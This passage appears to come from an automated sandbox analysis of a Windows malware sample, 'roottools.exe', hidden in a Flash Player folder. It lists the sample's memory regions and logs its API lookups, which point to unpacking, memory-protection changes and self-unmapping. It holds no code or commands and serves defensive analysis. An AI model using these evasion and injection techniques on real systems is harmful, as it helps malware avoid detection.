| private_0x0000000000050000 | 0x00050000 | 0x0008ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000090000 | 0x00090000 | 0x0018ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000190000 | 0x00190000 | 0x00193fff | Pagefile Backed Memory | Readable |
|
|
|
|
| locale.nls | 0x001a0000 | 0x00206fff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000000210000 | 0x00210000 | 0x0028ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000290000 | 0x00290000 | 0x0029ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002a0000 | 0x002a0000 | 0x002a6fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000002b0000 | 0x002b0000 | 0x002b1fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002c0000 | 0x002c0000 | 0x002c7fff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x00000000002d0000 | 0x002d0000 | 0x002d0fff | Pagefile Backed Memory | Readable, Writable |
|
|
|
|
| private_0x00000000002f0000 | 0x002f0000 | 0x002fffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | Readable, Writable |
|
|
|
|
| roottools.exe | 0x00400000 | 0x00432fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000400000 | 0x00400000 | 0x0041bfff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000440000 | 0x00440000 | 0x0047ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000004b0000 | 0x004b0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000000510000 | 0x00510000 | 0x0051ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000000520000 | 0x00520000 | 0x006a7fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x00000000006b0000 | 0x006b0000 | 0x00830fff | Pagefile Backed Memory | Readable |
|
|
|
|
| pagefile_0x0000000000840000 | 0x00840000 | 0x01c3ffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x0000000001c40000 | 0x01c40000 | 0x01d3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001c40000 | 0x01c40000 | 0x01d1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001c40000 | 0x01c40000 | 0x01cbffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001ce0000 | 0x01ce0000 | 0x01d1ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d30000 | 0x01d30000 | 0x01d3ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000001d40000 | 0x01d40000 | 0x0213ffff | Private Memory | Readable, Writable |
|
|
|
|
| sortdefault.nls | 0x02140000 | 0x0240efff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000002410000 | 0x02410000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002410000 | 0x02410000 | 0x024eefff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x00000000024f0000 | 0x024f0000 | 0x025effff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x0000000002600000 | 0x02600000 | 0x0263ffff | Private Memory | Readable, Writable |
|
|
|
|
| pagefile_0x0000000002640000 | 0x02640000 | 0x02a32fff | Pagefile Backed Memory | Readable |
|
|
|
|
| staticcache.dat | 0x02a40000 | 0x0336ffff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003370000 | 0x03370000 | 0x0349ffff | Private Memory | Readable, Writable |
|
|
|
|
| rsaenh.dll | 0x03370000 | 0x033abfff | Memory Mapped File | Readable |
|
|
|
|
| private_0x0000000003460000 | 0x03460000 | 0x0349ffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x00000000034a0000 | 0x034a0000 | 0x0b49ffff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x000000000b4a0000 | 0x0b4a0000 | 0x0b5effff | Private Memory | Readable, Writable |
|
|
|
|
| msvbvm60.dll | 0x72940000 | 0x72a92fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sxs.dll | 0x74010000 | 0x7406efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dwmapi.dll | 0x74130000 | 0x74142fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| uxtheme.dll | 0x741b0000 | 0x7422ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64cpu.dll | 0x743d0000 | 0x743d7fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64win.dll | 0x743e0000 | 0x7443bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wow64.dll | 0x74440000 | 0x7447efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rsaenh.dll | 0x75630000 | 0x7566afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptsp.dll | 0x75670000 | 0x75685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| secur32.dll | 0x75690000 | 0x75697fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dhcpcsvc.dll | 0x756a0000 | 0x756b1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| winnsi.dll | 0x756c0000 | 0x756c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iphlpapi.dll | 0x756d0000 | 0x756ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| cryptbase.dll | 0x75800000 | 0x7580bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sspicli.dll | 0x75810000 | 0x7586ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| user32.dll | 0x758c0000 | 0x759bffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernel32.dll | 0x759c0000 | 0x75acffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| psapi.dll | 0x75ad0000 | 0x75ad4fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ole32.dll | 0x75ae0000 | 0x75c3bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| iertutil.dll | 0x75c40000 | 0x75e3afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msvcrt.dll | 0x75e70000 | 0x75f1bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| wininet.dll | 0x75f20000 | 0x76014fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| imm32.dll | 0x760b0000 | 0x7610ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| usp10.dll | 0x76110000 | 0x761acfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| oleaut32.dll | 0x761b0000 | 0x7623efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| crypt32.dll | 0x76240000 | 0x7635cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msasn1.dll | 0x76360000 | 0x7636bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shlwapi.dll | 0x76370000 | 0x763c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| msctf.dll | 0x76570000 | 0x7663bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x76640000 | 0x76685fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| urlmon.dll | 0x76690000 | 0x767c5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| sechost.dll | 0x767d0000 | 0x767e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| nsi.dll | 0x767f0000 | 0x767f5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| rpcrt4.dll | 0x76800000 | 0x768effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| lpk.dll | 0x768f0000 | 0x768f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| gdi32.dll | 0x76950000 | 0x769dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| shell32.dll | 0x76a70000 | 0x776b9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| advapi32.dll | 0x77740000 | 0x777dffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ws2_32.dll | 0x777e0000 | 0x77814fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000778b0000 | 0x778b0000 | 0x779a9fff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| private_0x00000000779b0000 | 0x779b0000 | 0x77acefff | Private Memory | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77ad0000 | 0x77c78fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| ntdll.dll | 0x77cb0000 | 0x77e2ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| pagefile_0x000000007efb0000 | 0x7efb0000 | 0x7efd2fff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007efd8000 | 0x7efd8000 | 0x7efdafff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdb000 | 0x7efdb000 | 0x7efddfff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efde000 | 0x7efde000 | 0x7efdefff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efdf000 | 0x7efdf000 | 0x7efdffff | Private Memory | Readable, Writable |
|
|
|
|
| private_0x000000007efe0000 | 0x7efe0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| pagefile_0x000000007efe0000 | 0x7efe0000 | 0x7f0dffff | Pagefile Backed Memory | Readable |
|
|
|
|
| private_0x000000007f0e0000 | 0x7f0e0000 | 0x7ffdffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | Readable |
|
|
|
|
| private_0x000000007fff0000 | 0x7fff0000 | 0x7fffffeffff | Private Memory | Readable |
|
|
|
|
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsTNT, address_out = 0x0 |
|
1 | |
| Environment | Get Environment String | - |
|
1 | |
| File | Open | filename = STD_INPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_INPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_OUTPUT_HANDLE |
|
1 | |
| File | Get Info | filename = STD_OUTPUT_HANDLE, type = file_type |
|
1 | |
| File | Open | filename = STD_ERROR_HANDLE |
|
1 | |
| File | Get Info | filename = STD_ERROR_HANDLE, type = file_type |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\kernel32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessorFeaturePresent, address_out = 0x759d5235 |
|
1 | |
| Mutex | Create | - |
|
1 | |
| Module | Get Handle | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, base_address = 0x400000 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| Module | Get Filename | module_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Windows\system32\MSVBVM60.DLL, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Load | module_name = OLEAUT32.DLL, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = OleLoadPictureEx, address_out = 0x762170a1 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\oleaut32.dll, base_address = 0x761b0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = DispCallFunc, address_out = 0x761c3dcf |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = LoadTypeLibEx, address_out = 0x761c07b7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = UnRegisterTypeLib, address_out = 0x761e1ca9 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = CreateTypeLib2, address_out = 0x761c8e70 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDateFromUdate, address_out = 0x761c7684 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarUdateFromDate, address_out = 0x761ccc98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetAltMonthNames, address_out = 0x761f903a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNumFromParseNum, address_out = 0x761c6231 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarParseNumFromStr, address_out = 0x761c5fea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR4, address_out = 0x761d3f94 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromR8, address_out = 0x761d4e9e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromDate, address_out = 0x761fdb72 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromI4, address_out = 0x761e2a8c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecFromCy, address_out = 0x761fd737 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarR4FromDec, address_out = 0x761fe015 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromTypeInfo, address_out = 0x761fcc3d |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = GetRecordInfoFromGuids, address_out = 0x761fd1c4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetRecordInfo, address_out = 0x761fd48c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetRecordInfo, address_out = 0x761fd4c6 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayGetIID, address_out = 0x761fd509 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArraySetIID, address_out = 0x761ce7bb |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCopyData, address_out = 0x761ce496 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayAllocDescriptorEx, address_out = 0x761cddf1 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = SafeArrayCreateEx, address_out = 0x761fd53f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormat, address_out = 0x76202055 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatDateTime, address_out = 0x762020ea |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatNumber, address_out = 0x76202151 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatPercent, address_out = 0x762021f5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFormatCurrency, address_out = 0x76202288 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarWeekdayName, address_out = 0x76202335 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMonthName, address_out = 0x762023d5 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAdd, address_out = 0x761d5934 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAnd, address_out = 0x761d5a98 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCat, address_out = 0x761d59b4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDiv, address_out = 0x7622e405 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarEqv, address_out = 0x7622ef07 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarIdiv, address_out = 0x7622f00a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarImp, address_out = 0x7622ef47 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMod, address_out = 0x7622f15e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarMul, address_out = 0x7622dbd4 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarOr, address_out = 0x7622ecfa |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarPow, address_out = 0x7622ea66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarSub, address_out = 0x7622d332 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarXor, address_out = 0x7622ee2e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarAbs, address_out = 0x7622ca11 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarFix, address_out = 0x7622cc5f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarInt, address_out = 0x7622cde7 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNeg, address_out = 0x7622c802 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarNot, address_out = 0x7622ec66 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarRound, address_out = 0x7622d155 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCmp, address_out = 0x761cb0dc |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecAdd, address_out = 0x761e5f3e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarDecCmp, address_out = 0x761d4fd0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCat, address_out = 0x761d0d2c |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarCyMulI4, address_out = 0x761e59ed |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\oleaut32.dll, function = VarBstrCmp, address_out = 0x761bf8b8 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\ole32.dll, base_address = 0x75ae0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CoCreateInstanceEx, address_out = 0x75b29d4e |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ole32.dll, function = CLSIDFromProgIDEx, address_out = 0x75af0782 |
|
1 | |
| Module | Get Filename | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe, file_name_orig = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\roottools.exe, size = 260 |
|
2 | |
| Module | Load | module_name = SXS.DLL, base_address = 0x74010000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\sxs.dll, function = SxsOleAut32MapIIDOrCLSIDToTypeLibrary, address_out = 0x74057685 |
|
1 | |
| Module | Get Handle | module_name = c:\windows\syswow64\user32.dll, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetSystemMetrics, address_out = 0x758d7d2f |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromWindow, address_out = 0x758e3150 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromRect, address_out = 0x758fe7a0 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = MonitorFromPoint, address_out = 0x758e5281 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumDisplayMonitors, address_out = 0x758e451a |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetMonitorInfoA, address_out = 0x758e4413 |
|
1 | |
| Window | Create | class_name = ThunderRT6Main, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| Window | Create | class_name = VBMsoStdCompMgr, wndproc_parameter = 0 |
|
1 | |
| Window | Set Attribute | class_name = VBMsoStdCompMgr, index = 0, new_long = 4923548 |
|
1 | |
| Window | Create | class_name = VBFocusRT6, wndproc_parameter = 0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\VBA\Monitors |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| Keyboard | Get Info | type = KB_LOCALE_ID, os_tid = 0, result_out = 67699721 |
|
1 | |
| Window | Create | window_name = Langskallet7, wndproc_parameter = 0 |
|
1 | |
| Module | Load | module_name = KERNEL32 , base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadProcessMemory, address_out = 0x759ecfcc |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = EnumResourceTypesA, address_out = 0x75a50efd |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = Shell_NotifyIconA, address_out = 0x76cb8af2 |
|
1 | |
| Module | Load | module_name = NTDLL, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = ZwSetInformationProcess, address_out = 0x77ccfb18 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = GetDesktopWindow, address_out = 0x758e0a19 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtYieldExecution, address_out = 0x77ccff2c |
|
1 | |
| System | Sleep | duration = 15 milliseconds (0.015 seconds) |
|
32 | |
| System | Sleep | duration = 8000 milliseconds (8.000 seconds) |
|
1 | |
| Module | Load | module_name = ntdll, base_address = 0x77cb0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\ntdll.dll, function = NtProtectVirtualMemory, address_out = 0x77cd0028 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileA, address_out = 0x759d53c6 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSize, address_out = 0x759d196e |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = UnmapViewOfFile, address_out = 0x759d1826 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualProtectEx, address_out = 0x75a545bf |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = GetLongPathNameA, address_out = 0x75a5437f |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateProcess, address_out = 0x759ed802 |
|
1 | |
| Module | Load | module_name = IPHlpApi, base_address = 0x756d0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\iphlpapi.dll, function = GetAdaptersInfo, address_out = 0x756d9263 |
|
1 | |
| Module | Load | module_name = kernel32, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 |
|
1 | |
| Module | Load | module_name = shell32, base_address = 0x76a70000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteA, address_out = 0x76cb7078 |
|
1 | |
| Module | Load | module_name = User32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumWindows, address_out = 0x758dd1cf |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 |
|
1 | |
| Module | Load | module_name = user32, base_address = 0x758c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\user32.dll, function = EnumThreadWindows, address_out = 0x758e3961 |
|
1 | |
| Module | Unmap | process_name = c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x759c0000 |
|
1 | |
